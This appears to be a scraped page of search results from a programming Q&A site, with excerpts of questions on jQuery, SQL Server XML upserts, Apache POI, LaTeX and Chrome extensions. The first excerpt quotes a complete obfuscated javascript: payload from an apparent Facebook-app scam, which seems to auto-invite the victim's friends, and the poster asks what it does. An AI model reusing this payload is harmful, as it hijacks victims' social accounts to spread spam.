Search Results

Search found 13669 results on 547 pages for 'document'.

Page 457/547 | < Previous Page | 453 454 455 456 457 458 459 460 461 462 463 464  | Next Page >

  • Obfuscated Javascript Code from Facebook Application?

    - by V.K.
    This is the code that was copied and pasted into my address bar: javascript:(function() {a='app117970624901700_jop';b='app117970624901700_jode';ifc='app117970624901700_ifc';ifo='app1179 70624901700_ifo';mw='app117970624901700_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return (c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)) {while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c]) p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e= ["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N \\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\ p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g \\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\ \F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d [e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e [15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e [5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x 70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document| mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})(); I ran it through http://jsbeautifier.org/ , but it didn't clean up the later part dealing with the "new RegExp"... anyone know what this code does and how to figure it out?

    Read the article

  • Update or Insert Row depending on whether row is present in Microsoft SQL Server 2005

    - by Srikanth
    Hi, I am passing a XML document as a input to a stored procedure in Microsoft SQL Server 2005. This is the sample XML being passed as input <Strategy StrategyID="0" TOStrategyID="8" ShutdownQtySell="1" ShutdownQtyBuy="1"> <ParameterRange ParameterSetID="6" ParameterRangeID="1" ParameterRangeFrom="0" ParameterRangeTo="20" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="4" ParameterRangeFrom="21" ParameterRangeTo="40" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="5" ParameterRangeFrom="41" ParameterRangeTo="60" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="6" ParameterRangeFrom="61" ParameterRangeTo="80" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="7" ParameterRangeFrom="81" ParameterRangeTo="100" ParameterAutoTakeOut="False"> </ParameterRange> </Strategy> I am able to retrieve the data using OpenXML functionality in SQL server I am using this to get the data corresponding to ParameterRange rows SELECT ParameterRangeID as iRangeID, ParameterSetID as iSetID, ParameterRangeFrom as fRangeFrom, ParameterRangeTo as fRangeTo, ParameterAutoTakeOut as bTakeoutEnabled FROM OPENXML(@idoc, '/Strategy/ParameterRange', 1) WITH (ParameterSetID int,ParameterRangeID int,ParameterRangeFrom float,ParameterRangeTo float,ParameterAutoTakeOut bit) Now, I need to insert/update these rows into a table TempRanges which has (iRangeID,iSetID) as the primary key. If there is a row with the primary key, I want to update it the latest values and If there is no row with that primary key, I need to insert into the table. How can I accomplish this inside the Stored Procedure ? Thanks, Sri

    Read the article

  • How can i change a jquery plugin's option value with my value?

    - by Pandiya Chendur
    I have just jquery pagination plugin to work... But what happens is when i click page number 2 i get the first page and when i click 3 i get second page and so on.... My initial page my current page value changes to 0 instead 1 this causes the problem... My plugin has this, jQuery.fn.pagination = function(maxentries, opts){ opts = jQuery.extend({ items_per_page:10, num_display_entries:10, current_page:0, num_edge_entries:0, link_to:"#", prev_text:"Prev", next_text:"Next", ellipse_text:"...", prev_show_always:true, next_show_always:true, callback:function(){return false;} },opts||{}); current_page is set to 0 ... I have modified the current page value in my jquery function but it doesn't seem to work.... <script type="text/javascript"> var itemsPerPage = 5; var maxNumberOfElementsHere = 17; $(document).ready(function() { getRecordspage(1, itemsPerPage); $(".pager").pagination(maxNumberOfElementsHere, { callback: getRecordspage, current_page: 1, // Look here i have changed this but it doesn't work... items_per_page: itemsPerPage, num_display_entries: 5, next_text: 'Next', prev_text: 'Prev', num_edge_entries: 1 }); }); </script>

    Read the article

  • Fixed div once page is scrolled is flickering

    - by jasondavis
    I am trying to have an advertisement block/div that will be hald way down the page, once you scroll do the page to this point it will stick to the top. Here is a demo of what I am trying to do and the code I am using to do it with... http://jsfiddle.net/jasondavis/6vpA7/3/embedded/result/ In the demo it works perfectly how I am wanting it to be, however when I implement it on my live site, http://goo.gl/zuaZx it works but when you scroll down the div flickers in and out of view on each scroll or down key press. On my site to see the problem live it is the blokc on the right sidebar that says "Recommended Books" Here is the code I am using... $(document).ready( function() { $(window).scroll( function() { if ($(window).scrollTop() > $('#social-container').offset().top) $('#social').addClass('floating'); else $('#social').removeClass('floating'); } ); } );? css #social.floating { position: fixed; top: 0; }? My demo jsfiddle where it works correctly http://jsfiddle.net/jasondavis/6vpA7/3/ The only thing different on my live site is the div/id name is different. As you can see it is somewhat working on my live site except the flickering in and out of view as you scroll down the page. Anyone have any ideas why this would happen on my live site and not on my jsfiddle demo?

    Read the article

  • jQuery toggling div visibility

    - by Eef
    I have a HTML document with the below setup: <div class="main-div" style="padding: 5px; border: 1px solid green;"> <div class="first-div" style="width: 200px; height: 200px; padding: 5px; border: 1px solid purple"> First Div <a href="#" class="control">Control</a> </div> <div class="second-div hidden" style="width: 200px; height: 200px; padding: 5px; border: 1px solid red;"> Second Div <a href="#" class="control">Control</a> </div> </div> I also have a CSS class setup called hidden with display setup to none. I have jQuery setup like so: $('.control').click(function(){ var master = $(this).parent().parent(); var first_div = $(master).find(".first-div"); var second_div = $(master).find(".second-div"); $(first_div).toggleClass("hidden") $(second_div).toggleClass("hidden") }); This setup toggles the visibility of the divs, click the control button it hides one div and show the other. However this just hides and shows each div in a flash. I am looking to add some animation to the transitioning of the divs, maybe have one slide up and the other slide down when the 'control' is clicked and vice versa but I am unable to achieve this. Could anyone help out and give some advice on how to do this? Cheer Eef

    Read the article

  • Trying to fadein divs in a sequence, over time, using JQuery

    - by user346602
    Hi, I'm trying to figure out how to make 4 images fade in sequentially when the page loads. The following is my (amateurish) code: Here is the HTML: <div id="outercorners"> <img id="corner1" src="images/corner1.gif" width="6" height="6" alt=""/> <img id="corner2" src="images/corner2.gif" width="6" height="6" alt=""/> <img id="corner3" src="images/corner3.gif" width="6" height="6" alt=""/> <img id="corner4" src="images/corner4.gif" width="6" height="6" alt=""/> </div><!-- end #outercorners--> Here is the JQuery: $(document).ready(function() { $("#corner1").fadeIn("2000", function(){ $("#corner3").fadeIn("4000", function(){ $("#corner2").fadeIn("6000", function(){ $("#corner4").fadeIn("8000", function(){ }); }); }); }); Here is the css: #outercorners { position: fixed; top:186px; left:186px; width:558px; height:372px; } #corner1 { position: fixed; top:186px; left:186px; display: none; } #corner2 { position: fixed; top:186px; left:744px; display: none; } #corner3 { position: fixed; top:558px; left:744px; display: none; } #corner4 { position: fixed; top:558px; left:186px; display: none; } They seem to just wink at me, rather than fade in in the order I've ascribed to them. Should I be using the queue() function? And, if so, how would I implement it in this case? Thank you for any assistance.

    Read the article

  • why the main method are not covered? urgent, please help me

    - by Mike.Huang
    main method: public static void main(String[] args) throws Exception { if (args.length != EXPECTED_NUMBER_OF_ARGUMENTS) { System.err.println("Usage - java XFRCompiler ConfigXML PackageXML XFR"); } String configXML = args[0]; String packageXML = args[1]; String xfr = args[2]; AutoConfigCompiler compiler = new AutoConfigCompiler(); compiler.setConfigDocument(loadDocument(configXML)); compiler.setPackageInfoDoc(loadDocument(packageXML)); // compiler.setVisiblityDoc(loadDocument("VisibilityFilter.xml")); compiler.compileModel(xfr); } private static Document loadDocument(String fileName) throws Exception { TXDOMParser parser = (TXDOMParser) ParserFactory.makeParser(TXDOMParser.class.getName()); InputSource source = new InputSource(new FileInputStream(fileName)); parser.parse(source); return parser.getDocument(); } testcase: @Test public void testCompileModel() throws Exception { // construct parameters URL configFile = Thread.currentThread().getContextClassLoader().getResource("Ford_2008_Mustang_Config.xml"); URL packageFile = Thread.currentThread().getContextClassLoader().getResource("Ford_2008_Mustang_Package.xml"); File tmpFile = new File("Ford_2008_Mustang_tmp.xfr"); if(!tmpFile.exists()) { tmpFile.createNewFile(); } String[] args = new String[]{configFile.getPath(),packageFile.getPath(),tmpFile.getPath()}; try { // test main method XFRCompiler.main(args); } catch (Exception e) { assertTrue(true); } try { // test args length is less than 3 XFRCompiler.main(new String[]{"",""}); } catch (Exception e) { assertTrue(true); } tmpFile.delete(); } coverage outputs displayed as the lines from “String configXML = args[0];" in main method are not covered

    Read the article

  • Remove second class from an element and add another class

    - by rahul
    Hi, $(document).ready ( function () { $(".MenuItem").mouseover ( function () { // Remove second class and add another class [ Maintain MenuItem class ] // Eg: For div1 remove Sprite1 and then add Sprite1Dis and for div2 // remove Sprite2 and add Spprite2Dis }); $(".MenuItem").mouseout ( function () { // Reverse of mouseover. ie Remove Sprite1Dis and add Sprite1 }); }); <div id="div1" class="MenuItem Sprite1"> &nbsp; </div> <div id="div2" class="MenuItem Sprite2"> &nbsp; </div> <div id="div3" class="MenuItem Sprite3"> &nbsp; </div> <div id="div4" class="MenuItem Sprite4"> &nbsp; </div> <div id="div5" class="MenuItem Sprite5"> &nbsp; </div> <div id="div6" class="MenuItem Sprite6"> &nbsp; </div> My problem is listed as comment inside the code section. What will be the easiest way to achieve this? Thanks in advance

    Read the article

  • Event type property lost in IE-8

    - by Channel72
    I've noticed a strange Javascript error which only seems to happen on Internet Explorer 8. Basically, on IE-8 if you have an event handler function which captures the event object in a closure, the event "type" property seems to become invalidated from within the closure. Here's a simple code snippet which reproduces the error: <html> <head> <script type = "text/javascript"> function handleClickEvent(ev) { ev = (ev || window.event); alert(ev.type); window.setTimeout(function() { alert(ev.type); // Causes error on IE-8 }, 20); } function foo() { var query = document.getElementById("query"); query.onclick = handleClickEvent; } </script> </head> <body> <input id = "query" type = "submit"> <script type = "text/javascript"> foo(); </script> </body> </html> So basically, what happens here is that within the handleClickEvent function, we have the event object ev. We call alert(ev.type) and we see the event type is "click". So far, so good. But then when we capture the event object in a closure, and then call alert(ev.type) again from within the closure, now all of a sudden Internet Explorer 8 errors, saying "Member not found" because of the expression ev.type. It seems as though the type property of the event object is mysteriously gone after we capture the event object in a closure. I tested this code snippet on Firefox, Safari and Chrome, and none of them report an error condition. But in IE-8, the event object seems to become somehow invalidated after it's captured in the closure. Question: Why is this happening in IE-8, and is there any workaround?

    Read the article

  • jquery load returns empty, possible MVC 2 problem?

    - by Max Fraser
    I have a site that need to get some data from a different sit that is using asp.net MVC/ The data to get loaded is from these pages: http://charity.hondaclassic.com/home/totaldonations http://charity.hondaclassic.com/Home/CharityList This should be a no brainer but for some reason I get an empty response, here is my JS: <script> jQuery.noConflict(); jQuery(document).ready(function($){ $('.totalDonations').load('http://charity.hondaclassic.com/home/totaldonations'); $('#charityList').load('http://charity.hondaclassic.com/home/CharityList'); }); </script> in firebug I see the request is made and come back with a response of 200 OK but the response is empty, if you browse to these pages they work fine! What the heck? Here are the controller actions from the MVC site: public ActionResult TotalDonations() { var total = "$" + repo.All<Customer>().Sum(x => x.AmountPaid).ToString(); return Content(total); } public ActionResult CharityList() { var charities = repo.All<Company>(); return View(charities); } Someone please out what stupid little thing I am missing - this should have taken me 5 minutes and it's been hours!

    Read the article

  • JQuery Dragging Outside Parent

    - by Andy
    I'm using JQuery's draggable(); to make li elements draggable. The only problem is when the element is dragged outside its parent, it doesn't show up. That is, it doesn't leave the confines of its parent div. An example is here: http://imgur.com/N2N1L.png - it's as if the z-index for everything else has greater priority (and the element slides under everything). Here's the code: $('.photoList li').draggable({ distance: 20, snap: theVoteBar, revert: true, containment: 'document' }); And the li elements are placed in DIVs like this: <div class="coda-slider preload" id="coda-slider-1"> <div class="panel"> <div class="panel-wrapper"> <h2 class="title" style="display:none;">Page 1</h2> <ul class="photoList"> <li> <img class="ui-widget-content" src="photos/1.jpg" style="width:100px;height:100px;" /> </li> </ul> </div> </div> I'm positive the problem is it won't leave its parent container, but I'm not sure what to do to get it out. Any direction or help would be appreciated GREATLY!

    Read the article

  • Jquery cant get facebox working inside ajax call

    - by John
    From my main page I call an ajax file via jquery, in that ajax file is some additional jquery code. Original link looks like this: <a href="/page1.php" class="guest-action notify-function"><img src="/icon1.png"></a> Then the code: $(document).ready(function(){ $('a[rel*=facebox]').facebox(); $('.guest-action').click( function() { $.get( $(this).attr('href'), function(responseText) { $.jGrowl(responseText); }); return false; }); $('.notify-function').click( function() { $(this).find('img').attr('src','/icon2.png'); $(this).attr('href','/page2.php'); $(this).removeClass('guest-action').removeClass('notify-function').attr('rel','facebox'); }); }); So basically after notify-function is clicked I am changing the icon and the url of the link, I then am removing the classes so that the click wont be ran again and add rel="facebox" to the link so that the facebox window will pop up if they try to click the new icon2.png that shows up. The problem is after I click the initial icon everything works just fine except when I try to click the new icon2.png it still executes the jgrowl code from the guest-action. But when I view the source it shows this: <a href="/page2.php" rel="facebox" class=""><img src="/icon2.png"></a> So it seemed that should work right? What am I doing wrong? I tried adding the facebox code to the main page that is calling the ajax file as well and still same issue.

    Read the article

  • Latex - Apply an operation to every character in a string

    - by hroest
    Hi I am using LaTeX and I have a problem concerning string manipulation. I want to have an operation applied to every character of a string, specifically I want to replace every character "x" with "\discretionary{}{}{}x". I want to do this because I have a long string (DNA) which I want to be able to separate at any point without hyphenation. Thus I would like to have a command called "myDNA" that will do this for me instead of inserting manually \discretionary{}{}{} after every character. Is this possible? I have looked around the web and there wasnt much helpful information on this topic (at least not any I could understand) and I hoped that you could help. --edit To clarify: What I want to see in the finished document is something like this: the dna sequence is CTAAAGAAAACAGGACGATTAGATGAGCTTGAGAAAGCCATCACCACTCA AATACTAAATGTGTTACCATACCAAGCACTTGCTCTGAAATTTGGGGACTGAGTACACCAAATACGATAG ATCAGTGGGATACAACAGGCCTTTACAGCTTCTCTGAACAAACCAGGTCTCTTGATGGTCGTCTCCAGGT ATCCCATCGAAAAGGATTGCCACATGTTATATATTGCCGATTATGGCGCTGGCCTGATCTTCACAGTCAT CATGAACTCAAGGCAATTGAAAACTGCGAATATGCTTTTAATCTTAAAAAGGATGAAGTATGTGTAAACC CTTACCACTATCAGAGAGTTGAGACACCAGTTTTGCCTCCAGTATTAGTGCCCCGACACACCGAGATCCT AACAGAACTTCCGCCTCTGGATGACTATACTCACTCCATTCCAGAAAACACTAACTTCCCAGCAGGAATT just plain linebreaks, without any hyphens. The DNA sequence will be one long string without any spaces or anything but it can break at any point. This is why my idea was to inesert a "\discretionary{}{}{}" after every character, so that it can break at any point without inserting any hyphens.

    Read the article

  • Issue reading in a cell from Excel with Apache POI

    - by Nick
    I am trying to use Apache POI to read in old (pre-2007 and XLS) Excel files. My program goes to the end of the rows and iterates back up until it finds something that's not either null or empty. Then it iterates back up a few times and grabs those cells. This program works just fine reading in XLSX and XLS files made in Office 2010. I get the following error message: Exception in thread "main" java.lang.NumberFormatException: empty String at sun.misc.FloatingDecimal.readJavaFormatString(Unknown Source) at java.lang.Double.parseDouble(Unknown Source) at the line: num = Double.parseDouble(str); from the code: str = cell.toString(); if (str != "" || str != null) { System.out.println("Cell is a string"); num = Double.parseDouble(str); } else { System.out.println("Cell is numeric."); num = cell.getNumericCellValue(); } where the cell is the last cell in the document that's not empty or null. When I try to print the first cell that's not empty or null, it prints nothing, so I think I'm not accessing it correctly.

    Read the article

  • add dynamic field near his parent field?

    - by Kaps Hasija
    hi in my web page i am using Add Dynamic Field Functionality by using jquery. I am adding new div bu clicking on Existing div Like <div class="divA">divA1 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> by clicking on parent div i am creating new daynamic div <div class="divA">DivA2 </div> its coming end of the all div's like that <div class="divA">divA1 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> <div class="divA">DivA2 </div> But i need along with his parent div Like that <div class="divA">divA1 </div> <div class="divA">DivA2 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> any idea Thanks. This is My Jquery Code newTextBoxDiv = $(document.createElement('div')) .attr("id", text).attr("class", 'test0 ' + text); newTextBoxDiv.html('<div style=" width:150px; class="DivA" float: left"> </div>'); } newTextBoxDiv.appendTo("#contents"); contents is id of main div

    Read the article

  • javascript: waiting for an iframe page to load before writing to it (but not from the page that's tr

    - by Bill Dawes
    Apologies if this has been answered elsewhere, but I haven't been able to find it referenced. (Probably because nobody else would want to do such a daft thing, I admit). So, I have a page with three iframes in it. An event on one triggers a javascript function which loads new pages into the other two iframes; ['topright'] and ['bottomright']. However, javascript in the page that is being loaded into iframe 'topright' then needs to send information to elements in the 'bottomright' iframe. window.frames['bottomright'].document.subform.ID_client = client; etc But this will only work if the page has fully loaded into the bottomright frame. So what would be the most efficient way for that code in the 'topright' iframe to check and ensure that that form element in the bottomright frame is actually available to write to, before it does write to it? Bearing in mind that the page load has NOT been triggered from the topright frame, so I can't simply use an onLoad function. (I know this probably sounds like a hideously tortuous route for getting data from one page to another, but that's another story. The client is always right, etc...:-))

    Read the article

  • asp.net jquery how to use Plugin/Validation with web content

    - by Eyla
    I have a asp.net web content from that have a asp.net textbox and I want to use Plugin/Validation but it is not working with me here is my code: <%@ Page Title="" Language="C#" MasterPageFile="~/Master.Master" AutoEventWireup="true" CodeBehind="WebForm1.aspx.cs" Inherits="IMAM_APPLICATION.WebForm1" %> <%@ Register assembly="AjaxControlToolkit" namespace="AjaxControlToolkit" tagprefix="asp" %> <asp:Content ID="Content1" ContentPlaceHolderID="head" runat="server"> <script src="js/jquery-1.4.1.js" type="text/javascript"></script> <script src="js/jquery.validate.js" type="text/javascript"></script> <script type="text/javascript"> $(document).ready(function() { $.validator.addMethod("#<%=TextBox1.ClientID %>", function(value, element) { return this.optional(element) || /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,16}$/i.test(value); }, "Passwords are 8-16 characters with uppercase letters, lowercase letters and at least one number."); }); </script> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" runat="server"> </asp:Content> <asp:Content ID="Content3" ContentPlaceHolderID="ContentPlaceHolder2" runat="server"> <asp:TextBox ID="TextBox1" runat="server"></asp:TextBox> </asp:Content>

    Read the article

  • jquery image fading with tabs

    - by StealthRT
    Hey all, i am trying my best to figure out how to go about doing this: I have 2 tabs. When the page loads tab1 is selected automatically. This shows the tab as 1.0 transparency while tab2 stays at 0.7. Once the user clicks on tab2, tab1 goes to 0.7 transparency and tab2 goes to 1.0. However, i can not seem to get it to do that! Here is my code: <script type="text/javascript"> function checkTab(theTab) { $('#tab1').fadeTo(250, 0.70); $('#tab2').fadeTo(250, 0.70); if ($("#tabActive").val() == theTab) { $(theTab).fadeTo(250, 1); } } $(document).ready(function() { $('#tab1').hover(function() {$(this).fadeTo(250, 1)}, function() {checkTab('#tab1')}); $('#tab2').hover(function() {$(this).fadeTo(250, 1)}, function() {checkTab('#tab2')}); $('#tab2').fadeTo(250, 0.70); $('#tabActive').val('tab1'); }); </script> <li class="stats"><img src="images/Stats.png" name="nav1" width="70" height="52" id="tab1" onclick="$('#tabActive').val('tab1');" /></li> <li class="cal"><img src="images/cal.png" name="nav1" width="70" height="52" id="tab2" onclick="$('#tabActive').val('tab2');" /></li> <input name="tabActive" id="tabActive" type="text" /> Any help would be great! :) David

    Read the article

  • How do I animate text links in jquery?

    - by Peter
    I am somewhat new to jquery and I have a problem with something I am trying to implement using jquery. I have a vertical navigation menu where each link animates on hover by changing color, increasing letter spacing, and adding a border on the left. Everything is working the way I want it to except for when I click on the link. After I click on the link, the text changes to a different color and remains that same color even when I hover over the link. I am wanting to make it to where the color change on hover remains intact even after I click the link. I'm sure I am missing something simple, but I have tried everything I know to do with no luck. Any suggestions would be helpful! Here is what I have for the animation... <script type="text/javascript"> $(document).ready(function(){ $("ul.navlist li a").hover(function(){ $(this).stop() .animate({paddingLeft: '10px',letterSpacing: '2px',borderWidth:'20px'},{queue:false,easing:'easeInQuad'},50) }, function(){ $(this).stop() .animate({paddingLeft: '0px', letterSpacing: '0px',borderWidth:'0px'},{queue:false,easing:'easeOutQuad'},50) }); }); </script> My css for the navigation list is here... .navlist { list-style: none; } .navlist a { border-left-color: #555555; border-left-style: solid; border-left-width: 0px; color: #c4c4c4; } .navlist a:hover { border-left-color: #555555; border-left-style: solid; color: #555555; }

    Read the article

  • How do I use HTML5's localStorage in a Google Chrome extension?

    - by davidkennedy85
    I am trying to develop an extension that will work with Awesome New Tab Page. I've followed the author's advice to the letter, but it doesn't seem like any of the script I add to my background page is being executed at all. Here's my background page: <script> var info = { poke: 1, width: 1, height: 1, path: "widget.html" } chrome.extension.onRequestExternal.addListener(function(request, sender, sendResponse) { if (request === "mgmiemnjjchgkmgbeljfocdjjnpjnmcg-poke") { chrome.extension.sendRequest( sender.id, { head: "mgmiemnjjchgkmgbeljfocdjjnpjnmcg-pokeback", body: info, } ); } }); function initSelectedTab() { localStorage.setItem("selectedTab", "Something"); } initSelectedTab(); </script> Here is manifest.json: { "update_url": "http://clients2.google.com/service/update2/crx", "background_page": "background.html", "name": "Test Widget", "description": "Test widget for mgmiemnjjchgkmgbeljfocdjjnpjnmcg.", "icons": { "128": "icon.png" }, "version": "0.0.1" } Here is the relevant part of widget.html: <script> var selectedTab = localStorage.getItem("selectedTab"); document.write(selectedTab); </script> Every time, the browser just displays null. The local storage isn't being set at all, which makes me think the background page is completely disconnected. Do I have something wired up incorrectly?

    Read the article

  • [jquery] multiple resizables acting strange

    - by Noweem
    Hi there everyone, I'm trying to place multiple resizable and draggable div's on one page that move (vertically) inside their own parent div. you can take a look at http://bit.ly/bCutBE However, these div's act really strange when I want to resize them, especially from the north side, they kind of move out of the screen very fast, while they shouldn't be able to get outside the parent div. I only want the div to be able to move and resize vertically inside it's parent, the dragging-part works pretty good, but the resize part give this problem. I can't really describe it better than this, but take a look for yourself and it will be clear immediately when you try to resize one of the coloured div's: move it a little downwards and try to resize it from the north side. the problem seems to be caused by the containment: 'parent', line of the resizable. when I delete this line it works fine, but then the coloured blocks don't stay in their parent, and I want them to stay inside their parent. I hope someone can help me with this... the jquery code I used: $(document).ready(function(){ $(".move") .draggable({ containment: 'parent', grid: [50,50], axis: 'y' }) .resizable({ containment: 'parent', grid: [50,50], handles: 'n, s', minHeight: 50 }); });

    Read the article

  • mvc jquery passing form values after user presses "Accept" button

    - by gdubs
    So I have a form and a submit button that posts the form to an action. But I wanted to show a popup where the user can deny or accept an agreement. Here's my jquery $(document).ready((function () { var dialog = $('#confirmation-dialog').dialog({ autoOpen: false, width: 500, height: 600, resizable: false, modal: true, buttons: { "Accept": function () { $(this).dialog('close'); $.ajax({ type: 'POST', data: {__RequestVerificationToken: $("input[name=__RequestVerificationToken]").val()} }); }, "Cancel": function () { $(this).dialog('close'); } } }); $('#registration-submit').click(function (e) { var action = $(this.form); console.log(action); var form = $('form'); dialog.dialog("open"); return false; }); })); My problem with this is that it would post, but it would only send my AntiforgeryToken, and not the values of the form. But when it goes through the TryupdateModel it would go through for some reason but will not Save (cuz of the missing data that wasn't passed on the formcollection).

    Read the article

  • Interchange structured data between Haskell and C

    - by Eonil
    First, I'm a Haskell beginner. I'm planning integrating Haskell into C for realtime game. Haskell does logic, C does rendering. To do this, I have to pass huge complexly structured data (game state) from/to each other for each tick (at least 30 times per second). So the passing data should be lightweight. This state data may laid on sequential space on memory. Both of Haskell and C parts should access every area of the states freely. In best case, the cost of passing data can be copying a pointer to a memory. In worst case, copying whole data with conversion. I'm reading Haskell's FFI(http://www.haskell.org/haskellwiki/FFICookBook#Working_with_structs) The Haskell code look specifying memory layout explicitly. I have a few questions. Can Haskell specify memory layout explicitly? (to be matched exactly with C struct) Is this real memory layout? Or any kind of conversion required? (performance penalty) If Q#2 is true, Any performance penalty when the memory layout specified explicitly? What's the syntax #{alignment foo}? Where can I find the document about this? If I want to pass huge data with best performance, how should I do that? *PS Explicit memory layout feature which I said is just C#'s [StructLayout] attribute. Which is specifying in-memory position and size explicitly. http://www.developerfusion.com/article/84519/mastering-structs-in-c/ I'm not sure Haskell has matching linguistic construct matching with fields of C struct.

    Read the article

  • Why this class assignment is not working in IE

    - by user550750
    I've wrote this peice of code, this works fine in FF and Chrome but not in IE. Why is it? <html> <header> <style type="text/css"> .red{ color: red; } .green{ color: green; } .yellow{ color: yellow; } </style> </header> <body> <div id="mydiv" style="height: 50px">Some contents</div> <div> <input type="radio" value="1" name="change" onclick="onClick(this)">Red</input> <input type="radio" value="2" name="change" onclick="onClick(this)">Green</input> <input type="radio" value="3" name="change" onclick="onClick(this)">Yellow</input> </div> <script type="text/javascript"> function onClick(el){ var className = ""; if(el.value == 1){ className = "red"; }else if(el.value == 2){ className = "green"; }else if(el.value == 3){ className = "yellow"; } document.getElementById("mydiv").setAttribute("class", className); } </script> </body> </html>

    Read the article

  • Javascript onclick() event bubbling - working or not?

    - by user1071914
    I have a table in which the table row tag is decorated with an onclick() handler. If the row is clicked anywhere, it will load another page. In one of the elements on the row, is an anchor tag which also leads to another page. The desired behavior is that if they click on the link, "delete.html" is loaded. If they click anywhere else in the row, "edit.html" is loaded. The problem is that sometimes (according to users) both the link and the onclick() are fired at once, leading to a problem in the back end code. They swear they are not double-clicking. I don't know enough about Javascript event bubbling, handling and whatever to even know where to start with this bizarre problem, so I'm asking for help. Here's a fragment of the rendered page, showing the row with the embedded link and associated script tag. Any suggestions are welcomed: <tr id="tableRow_3339_0" class="odd"> <td class="l"></td> <td>PENDING</td> <td>Yabba Dabba Doo</td> <td>Fred Flintstone</td> <td> <a href="/delete.html?requestId=3339"> <div class="deleteButtonIcon"></div> </a> </td> <td class="r"></td> </tr> <script type="text/javascript">document.getElementById("tableRow_3339_0").onclick = function(event) { window.location = '//edit.html?requestId=3339'; };</script>

    Read the article

< Previous Page | 453 454 455 456 457 458 459 460 461 462 463 464  | Next Page >